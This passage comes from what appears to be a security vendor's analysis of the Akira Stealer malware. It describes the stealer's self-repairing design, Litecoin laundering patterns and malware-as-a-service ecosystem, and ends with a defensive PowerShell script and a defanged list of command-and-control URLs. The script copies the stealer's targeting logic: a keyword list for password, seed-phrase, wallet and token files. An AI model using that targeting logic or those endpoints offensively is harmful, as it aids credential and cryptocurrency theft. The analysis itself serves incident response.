It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[1257,18601,18602,18605,18606],{},[251,18603,18604],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[1254,18607,18608,18617,18623,18629],{},[1257,18609,18610,1402,18613,805,18615,1288],{},[251,18611,18612],{},"PE Binaries",[63,18614,8296],{},[63,18616,8300],{},[1257,18618,18619,18622],{},[251,18620,18621],{},"Node.js / JavaScript"," (via Electron)",[1257,18624,18625,18628],{},[251,18626,18627],{},"PowerShell"," (used for obfuscated payload relay)",[1257,18630,18631,1402,18634,18636],{},[251,18632,18633],{},"Python",[63,18635,8304],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[1257,18638,18639,18642,18643],{},[251,18640,18641],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[1254,18644,18645,18648,18651,18654],{},[1257,18646,18647],{},"Base64 PowerShell relay",[1257,18649,18650],{},"AES-encrypted and GZIP-compressed Python core",[1257,18652,18653],{},"Obfuscated JavaScript with runtime token injection",[1257,18655,18656],{},"Self-healing behavior that frustrates partial removal",[1257,18658,18659,18662,18663,18564,18666,18668,18669,18671],{},[251,18660,18661],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[251,18664,18665],{},"removal of a single component is insufficient",[63,18667,8296],{}," is removed, the info stealer recreates it. 
If ",[63,18670,8304],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[12,18673,18674,18675,18678],{},"In short, the malware behaves more like a ",[251,18676,18677],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[12,18680,18681,18682,18685],{},"This elevates the threat from an opportunistic attack to a ",[251,18683,18684],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[41,18687,18689],{"id":18688},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[12,18691,47],{},[12,18693,18694],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[1254,18696,18697,18703,18718],{},[1257,18698,18699,18702],{},[251,18700,18701],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[1257,18704,18705,18708,18709,18711,18712,18711,18714,18711,18716,1013],{},[251,18706,18707],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[63,18710,8296],{}," → ",[63,18713,8804],{},[63,18715,8899],{},[63,18717,8276],{},[1257,18719,18720,18723],{},[251,18721,18722],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[12,18725,18726,18727,18730],{},"This isn’t just a stealer. It’s a ",[251,18728,18729],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[25,18732,18734],{"id":18733},"_9-blockchain-tracking-and-analysis","9. 
Blockchain Tracking and Analysis",[12,18736,31],{},[41,18738,18740],{"id":18739},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[12,18742,47],{},[12,18744,18745,18746,18749],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[63,18747,18748],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[12,18751,18752],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[12,18754,18755],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[12,18757,18758],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. 
These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[417,18760,420,18763],{"className":18761,"style":12346},[18762],"font-size-1",[438,18764,18765,420,18788,420,18820,420,18848,420,18877],{},[426,18766,424,18767,424,18771,424,18775,424,18778,424,18782,424,18785,420],{},[430,18768,18770],{"style":18769},"text-align: left; width: 14%;","Input Source",[430,18772,18774],{"style":18773},"text-align: left; width: 12%;","Input Date",[430,18776,18777],{"style":18769},"Amount In (LTC)",[430,18779,18781],{"style":18780},"text-align: left; width: 20%;","→ Attacker Wallet",[430,18783,18784],{"style":13965},"Output Addresses",[430,18786,18787],{"style":12514},"Total Out (LTC)",[426,18789,424,18790,424,18793,424,18796,424,18799,424,18805,424,18818,420],{},[443,18791,18792],{},"Input_1",[443,18794,18795],{},"2024-09-21",[443,18797,18798],{},"0.25339198",[443,18800,428,18801,424],{},[102,18802,18804],{"title":18803},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[443,18806,18807,18808,18811,18812,18807,18814,18817],{},"\n      - ",[63,18809,18810],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[531,18813],{},[63,18815,18816],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[443,18819,18798],{},[426,18821,424,18822,424,18825,424,18828,424,18831,424,18835,424,18846,420],{"style":12370},[443,18823,18824],{},"Input_2",[443,18826,18827],{},"2024-04-16",[443,18829,18830],{},"1.09976044",[443,18832,428,18833,424],{},[102,18834,18804],{"title":18803},[443,18836,18807,18837,18840,18841,18807,18843,18845],{},[63,18838,18839],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[531,18842],{},[63,18844,18839],{}," (0.25671380, 2024-06-13)\n    
",[443,18847,18830],{},[426,18849,424,18850,424,18853,424,18856,424,18859,424,18863,424,18875,420],{},[443,18851,18852],{},"Input_3",[443,18854,18855],{},"2024-03-06",[443,18857,18858],{},"0.77089346",[443,18860,428,18861,424],{},[102,18862,18804],{"title":18803},[443,18864,18807,18865,18868,18869,18807,18871,18874],{},[63,18866,18867],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[531,18870],{},[63,18872,18873],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[443,18876,18858],{},[426,18878,424,18879,424,18882,424,18884,424,18886,424,18890,424,18900,420],{"style":12370},[443,18880,18881],{},"Input_4",[443,18883,18855],{},[443,18885,18858],{},[443,18887,428,18888,424],{},[102,18889,18804],{"title":18803},[443,18891,18807,18892,18868,18895,18807,18897,18874],{},[63,18893,18894],{},"LUFLTrqYpix...",[531,18896],{},[63,18898,18899],{},"La22dfH9eM...",[443,18901,18858],{},[52,18903],{"className":18904},[8535,8536],[25,18906,18908],{"id":18907},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[12,18910,31],{},[12,18912,18913],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[41,18915,18917],{"id":18916},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[12,18919,47],{},[12,18921,18922],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. 
It includes:",[1254,18924,18925,18934,18940,18946,18952],{},[1257,18926,18927,18930,18931,1288],{},[251,18928,18929],{},"Builder Bots"," for on-demand payload generation (e.g., ",[63,18932,18933],{},"@AkiraRedBot",[1257,18935,18936,18939],{},[251,18937,18938],{},"Telegram channels"," for updates, feature requests, and customer support",[1257,18941,18942,18945],{},[251,18943,18944],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[1257,18947,18948,18951],{},[251,18949,18950],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[1257,18953,18954,18957],{},[251,18955,18956],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[12,18959,18960],{},[2642,18961],{"alt":18962,"src":18963},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[41,18965,18967],{"id":18966},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[12,18969,47],{},[12,18971,18972],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[1254,18974,18975,18981,18987,18993],{},[1257,18976,18977,18980],{},[251,18978,18979],{},"No deep technical skill"," is required to launch attacks",[1257,18982,18983,18986],{},[251,18984,18985],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[1257,18988,18989,18992],{},[251,18990,18991],{},"Instant support and documentation"," through Telegram",[1257,18994,18995,18998],{},[251,18996,18997],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[12,19000,19001],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[12,19003,19004],{},[2642,19005],{"alt":19006,"src":19007},"Akira 
Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[41,19009,19011],{"id":19010},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[12,19013,47],{},[12,19015,9399,19016,19018],{},[63,19017,8304],{}," is the heart of many attacks, the ecosystem provides a full chain:",[1254,19020,19021,19024,19027,19030,19033],{},[1257,19022,19023],{},"Obfuscation tools like PyInstaller wrappers",[1257,19025,19026],{},"File binders for coupling malicious payloads with benign software",[1257,19028,19029],{},"Compilers, crypters, and runtime polymorphism",[1257,19031,19032],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[1257,19034,19035],{},"Data management bots that summarize stolen credentials and hardware profiles",[12,19037,19038],{},[2642,19039],{"alt":19040,"src":19041},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[25,19043,19045],{"id":19044},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[12,19047,31],{},[41,19049,19051],{"id":19050},"_111-what-is-this-for","11.1 What Is This For?",[12,19053,47],{},[12,19055,19056,19057,805,19060,805,19063,9866,19066,19069],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. 
The QuickCheck PowerShell script outlined below replicates Akira's exact search logic: it scans the user's ",[251,19058,19059],{},"Desktop",[251,19061,19062],{},"Documents",[251,19064,19065],{},"Downloads",[251,19067,19068],{},"OneDrive"," folders for files that:",[1254,19071,19072,19088,19091],{},[1257,19073,19074,19075,805,19078,805,19081,19084,19085],{},"Contain sensitive keywords in their filename, such as ",[63,19076,19077],{},"password",[63,19079,19080],{},"wallet",[63,19082,19083],{},"backup",", or ",[63,19086,19087],{},"token",[1257,19089,19090],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[1257,19092,19093],{},"Are under the 2 MB size limit imposed by the malware",[12,19095,19096,19097,19100],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[251,19098,19099],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[12,19102,19103,19104,805,19107,805,19110,19113,19114,1013],{},"It then presents a sorted table of ",[251,19105,19106],{},"Filename",[251,19108,19109],{},"Relative Path",[251,19111,19112],{},"Size (KB)"," and the ",[251,19115,19116],{},"trigger keyword",[2110,19118,19119],{},[12,19120,19121,19124,19125,19128,19129,19131,19132,19135],{},[251,19122,19123],{},"DISCLAIMER","\nThis tool is provided ",[251,19126,19127],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[251,19130,18372],{}," guarantee detection of ",[251,19133,19134],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[52,19137],{"className":19138},[8535],[41,19140,19142],{"id":19141},"legal-notice","Legal Notice",[12,19144,47],{},[12,19146,19147,19148,19151,19152,19155],{},"This QuickCheck Utility is intended for ",[251,19149,19150],{},"defensive security"," assessments only. 
Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[251,19153,19154],{},"no liability"," for misuse or damages resulting from its use.",[41,19157,19159],{"id":19158},"powershell-script","PowerShell Script",[12,19161,47],{},[56,19163,19165],{"className":9365,"code":19164,"language":9367,"meta":65,"style":65},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. 
Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[63,19166,19167,19172,19177,19182,19186,19191,19196,19201,19206,19211,19216,19220,19225,19230,19235,19239,19244,19249,19253,19258,19263,19268,19273,19278,19282,19287,19292,19297,19301,19305,19310,19314,19319,19323,19328,19333,19338,19343,19348,19353,19358,19362,19367,19372,19377,19382,19387,19392,19397,19402,19407,19411,19416,19421,19425,19430,19435,19440,19445,19450,19455,19460,19465,19469,19473,19477,19482,19486,19491,19496,19501,19505,19510,19515,19520,19525,19530,19535,19540,19546,19551,19557,19562,19568,19574,19579,19584,19590],{"__ignoreMap":65},[102,19168,19169],{"class":104,"line":105},[102,19170,19171],{},"\u003C#\n",[102,19173,19174],{"class":104,"line":111},[102,19175,19176],{},".SYNOPSIS\n",[102,19178,19179],{"class":104,"line":329},[102,19180,19181],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[102,19183,19184],{"class":104,"line":346},[102,19185,11519],{"emptyLinePlaceholder":2181},[102,19187,19188],{"class":104,"line":650},[102,19189,19190],{},".DESCRIPTION\n",[102,19192,19193],{"class":104,"line":656},[102,19194,19195],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[102,19197,19198],{"class":104,"line":662},[102,19199,19200],{},"      • Contain one of the defined keywords in their name\n",[102,19202,19203],{"class":104,"line":668},[102,19204,19205],{},"      • Have an allowed file 
extension\n",[102,19207,19208],{"class":104,"line":674},[102,19209,19210],{},"      • Are not larger than 2 MB\n",[102,19212,19213],{"class":104,"line":680},[102,19214,19215],{},"    Presents the results in a colored, tabular overview.\n",[102,19217,19218],{"class":104,"line":12692},[102,19219,11519],{"emptyLinePlaceholder":2181},[102,19221,19222],{"class":104,"line":12698},[102,19223,19224],{},".NOTES\n",[102,19226,19227],{"class":104,"line":12704},[102,19228,19229],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[102,19231,19232],{"class":104,"line":12710},[102,19233,19234],{},"#>\n",[102,19236,19237],{"class":104,"line":12716},[102,19238,11519],{"emptyLinePlaceholder":2181},[102,19240,19241],{"class":104,"line":12722},[102,19242,19243],{},"# -------------------------------------\n",[102,19245,19246],{"class":104,"line":12728},[102,19247,19248],{},"# 1. Configuration\n",[102,19250,19251],{"class":104,"line":12734},[102,19252,19243],{},[102,19254,19255],{"class":104,"line":12740},[102,19256,19257],{},"$scanFolders = @(\n",[102,19259,19260],{"class":104,"line":12746},[102,19261,19262],{},"    \"$env:USERPROFILE\\Desktop\",\n",[102,19264,19265],{"class":104,"line":12752},[102,19266,19267],{},"    \"$env:USERPROFILE\\Documents\",\n",[102,19269,19270],{"class":104,"line":12758},[102,19271,19272],{},"    \"$env:USERPROFILE\\Downloads\",\n",[102,19274,19275],{"class":104,"line":12764},[102,19276,19277],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[102,19279,19280],{"class":104,"line":12770},[102,19281,12911],{},[102,19283,19284],{"class":104,"line":12776},[102,19285,19286],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[102,19288,19289],{"class":104,"line":13442},[102,19290,19291],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[102,19293,19294],{"class":104,"line":13447},[102,19295,19296],{},"$maxSize    = 
2MB\n",[102,19298,19299],{"class":104,"line":13452},[102,19300,11519],{"emptyLinePlaceholder":2181},[102,19302,19303],{"class":104,"line":13457},[102,19304,19243],{},[102,19306,19307],{"class":104,"line":13463},[102,19308,19309],{},"# 2. Scan and Collect Matches\n",[102,19311,19312],{"class":104,"line":13468},[102,19313,19243],{},[102,19315,19316],{"class":104,"line":13473},[102,19317,19318],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[102,19320,19321],{"class":104,"line":13478},[102,19322,11519],{"emptyLinePlaceholder":2181},[102,19324,19325],{"class":104,"line":13483},[102,19326,19327],{},"foreach ($folder in $scanFolders) {\n",[102,19329,19330],{"class":104,"line":13488},[102,19331,19332],{},"    if (-not (Test-Path $folder)) { continue }\n",[102,19334,19335],{"class":104,"line":13493},[102,19336,19337],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[102,19339,19340],{"class":104,"line":13499},[102,19341,19342],{},"        # 2.1 Extension filter\n",[102,19344,19345],{"class":104,"line":13505},[102,19346,19347],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[102,19349,19350],{"class":104,"line":13511},[102,19351,19352],{},"        # 2.2 Size filter\n",[102,19354,19355],{"class":104,"line":13516},[102,19356,19357],{},"        if ($_.Length -gt $maxSize) { return }\n",[102,19359,19360],{"class":104,"line":13521},[102,19361,11519],{"emptyLinePlaceholder":2181},[102,19363,19364],{"class":104,"line":13526},[102,19365,19366],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[102,19368,19369],{"class":104,"line":13531},[102,19370,19371],{},"        $hit = $null\n",[102,19373,19374],{"class":104,"line":13537},[102,19375,19376],{},"        foreach ($kw in $keywords) {\n",[102,19378,19379],{"class":104,"line":13542},[102,19380,19381],{},"            if ($_.Name.ToLower().Contains($kw)) 
{\n",[102,19383,19384],{"class":104,"line":13547},[102,19385,19386],{},"                $hit = $kw\n",[102,19388,19389],{"class":104,"line":13552},[102,19390,19391],{},"                break\n",[102,19393,19394],{"class":104,"line":13557},[102,19395,19396],{},"            }\n",[102,19398,19399],{"class":104,"line":13562},[102,19400,19401],{},"        }\n",[102,19403,19404],{"class":104,"line":13567},[102,19405,19406],{},"        if (-not $hit) { return }\n",[102,19408,19409],{"class":104,"line":13573},[102,19410,11519],{"emptyLinePlaceholder":2181},[102,19412,19413],{"class":104,"line":13579},[102,19414,19415],{},"        # 2.4 Build relative path\n",[102,19417,19418],{"class":104,"line":13585},[102,19419,19420],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[102,19422,19423],{"class":104,"line":13591},[102,19424,11519],{"emptyLinePlaceholder":2181},[102,19426,19427],{"class":104,"line":13596},[102,19428,19429],{},"        # 2.5 Collect\n",[102,19431,19432],{"class":104,"line":13601},[102,19433,19434],{},"        $matches.Add([PSCustomObject]@{\n",[102,19436,19437],{"class":104,"line":13607},[102,19438,19439],{},"            FileName    = $_.Name\n",[102,19441,19442],{"class":104,"line":13613},[102,19443,19444],{},"            Location    = $rel\n",[102,19446,19447],{"class":104,"line":13619},[102,19448,19449],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[102,19451,19452],{"class":104,"line":13625},[102,19453,19454],{},"            Keyword     = $hit\n",[102,19456,19457],{"class":104,"line":13630},[102,19458,19459],{},"        })\n",[102,19461,19462],{"class":104,"line":13635},[102,19463,19464],{},"    }\n",[102,19466,19467],{"class":104,"line":13641},[102,19468,10086],{},[102,19470,19471],{"class":104,"line":13646},[102,19472,11519],{"emptyLinePlaceholder":2181},[102,19474,19475],{"class":104,"line":13651},[102,19476,19243],{},[102,19478,19479],{"class":104,"line":13657},[102,19480,19481],{},"# 3. 
Display Results\n",[102,19483,19484],{"class":104,"line":13663},[102,19485,19243],{},[102,19487,19488],{"class":104,"line":13669},[102,19489,19490],{},"clear\n",[102,19492,19493],{"class":104,"line":13674},[102,19494,19495],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[102,19497,19498],{"class":104,"line":13680},[102,19499,19500],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[102,19502,19503],{"class":104,"line":13686},[102,19504,11519],{"emptyLinePlaceholder":2181},[102,19506,19507],{"class":104,"line":13691},[102,19508,19509],{},"if ($matches.Count -gt 0) {\n",[102,19511,19512],{"class":104,"line":13697},[102,19513,19514],{},"    $matches |\n",[102,19516,19517],{"class":104,"line":13703},[102,19518,19519],{},"        Sort-Object Location, FileName |\n",[102,19521,19522],{"class":104,"line":13708},[102,19523,19524],{},"        Format-Table -AutoSize `\n",[102,19526,19527],{"class":104,"line":13713},[102,19528,19529],{},"            @{Label='File';       Expression={$_.FileName}},\n",[102,19531,19532],{"class":104,"line":13718},[102,19533,19534],{},"            @{Label='Location';   Expression={$_.Location}},\n",[102,19536,19537],{"class":104,"line":13724},[102,19538,19539],{},"            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n",[102,19541,19543],{"class":104,"line":19542},79,[102,19544,19545],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[102,19547,19549],{"class":104,"line":19548},80,[102,19550,11519],{"emptyLinePlaceholder":2181},[102,19552,19554],{"class":104,"line":19553},81,[102,19555,19556],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[102,19558,19560],{"class":104,"line":19559},82,[102,19561,10086],{},[102,19563,19565],{"class":104,"line":19564},83,[102,19566,19567],{},"else {\n",[102,19569,19571],{"class":104,"line":19570},84,[102,19572,19573],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[102,19575,19577],{"class":104,"line":19576},85,[102,19578,10086],{},[102,19580,19582],{"class":104,"line":19581},86,[102,19583,11519],{"emptyLinePlaceholder":2181},[102,19585,19587],{"class":104,"line":19586},87,[102,19588,19589],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[102,19591,19593],{"class":104,"line":19592},88,[102,19594,19595],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[52,19597],{"className":19598},[8535,8536],[25,19600,19602],{"id":19601},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[12,19604,31],{},[12,19606,19607,19608],{},"Most security operations centers stop at containment.\n",[251,19609,19610],{},"We don’t.",[12,19612,19613],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[12,19615,19616],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. 
Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[12,19618,19619,19620,1013],{},"This philosophy is why we built the ",[251,19621,19622],{},"Akira Compromise Reporter",[12,19624,19625],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[1254,19627,19628,19631,19634],{},[1257,19629,19630],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[1257,19632,19633],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[1257,19635,19636],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[12,19638,19639],{},[2642,19640],{"alt":19641,"src":19642},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[12,19644,19645],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. Cybersecurity, done right, isn’t about simply reacting to incidents—it’s about understanding, adapting, and always staying one step ahead.",[12,19647,19648],{},[251,19649,19650],{},"That’s the glueckkanja CSOC difference.",[25,19652,19654],{"id":19653},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[12,19656,31],{},[12,19658,19659],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. 
All URLs are deliberately obfuscated to prevent accidental clicks.",[12,19661,19662],{},[251,19663,19664],{},"Abbreviations:",[1254,19666,19667,19673],{},[1257,19668,19669,19672],{},[251,19670,19671],{},"TG:"," Telegram reporting channel",[1257,19674,19675,19678],{},[251,19676,19677],{},"Alt:"," Alternate (fallback) endpoint",[41,19680,19682],{"id":19681},"_1-domains-urls","1. Domains & URLs",[12,19684,47],{},[417,19686,420,19688],{"className":19687,"style":12346},[18762],[438,19689,19690,420,19702,420,19715,420,19728,420,19741,420,19754,420,19767,420,19780,420,19796,420,19812,420,19825,420,19838,420,19851,420,19864,420,19877,420,19890,420,19903,420,19916,420,19929,420,19942,420,19956,420,19969],{},[426,19691,424,19692,424,19696,424,19700,420],{},[430,19693,19695],{"style":19694},"text-align: left; width: 18%;","Category",[430,19697,19699],{"style":19698},"text-align: left; width: 52%;","Obfuscated URL",[430,19701,12521],{"style":12514},[426,19703,424,19704,424,19707,424,19712,420],{},[443,19705,19706],{},"Primary Injection",[443,19708,19709],{},[63,19710,19711],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[443,19713,19714],{},"Initial attacker webhook endpoint",[426,19716,424,19717,424,19720,424,19725,420],{"style":12370},[443,19718,19719],{},"Fallback Injection",[443,19721,19722],{},[63,19723,19724],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[443,19726,19727],{},"Alternate injector endpoint",[426,19729,424,19730,424,19733,424,19738,420],{},[443,19731,19732],{},"Error Reporting (TG)",[443,19734,19735],{},[63,19736,19737],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[443,19739,19740],{},"Telegram error/log reporting URL",[426,19742,424,19743,424,19746,424,19751,420],{"style":12370},[443,19744,19745],{},"Error Reporting (Alt)",[443,19747,19748],{},[63,19749,19750],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[443,19752,19753],{},"Alternate error/log 
